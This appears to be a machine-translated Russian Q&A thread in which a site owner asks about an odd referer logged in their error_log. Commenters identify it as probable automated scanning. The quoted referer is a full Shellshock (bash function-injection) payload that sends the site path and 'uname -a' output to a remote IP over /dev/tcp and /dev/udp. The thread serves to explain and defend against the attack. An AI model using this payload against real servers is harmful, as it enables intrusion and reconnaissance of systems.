0
Я никогда не видел реферера в своем журнале ошибок, который исходил не от хотя бы URL-адреса ... что это такое? Какая-то попытка взлома?Что это за странная ссылка ссылки на мой сайт error_log?
referer:() { :;}; /bin/bash -c "echo SITE.COM/cgi-sys/php5 > /dev/tcp/67.228.177.7/23; /bin/uname -a > /dev/tcp/67.228.177.7/23; echo SITE.COM/cgi-sys/php5 > /dev/udp/67.228.177.7/80"
Как замечательно ... поскольку он не исходил из URL-адреса, значит ли это, что он появился из локальной оболочки? – x80
@ x80 Не обязательно. Скорее всего, это был удаленный скрипт, который случайно сканирует веб-сайты. Помните, что реферер, как вы видите, является лишь одним из заголовков, которые клиент передает серверам вместе с запросом - если я пишу программу, я могу сделать эти заголовки чем угодно. –
Ahh благодарит кучу, что очищает вещи. Просто ради безопасности я установил ossec, rkhunter и cxs scan. Никогда не будьте слишком осторожны с этими хакерскими монстрами там, в настоящее время ... – x80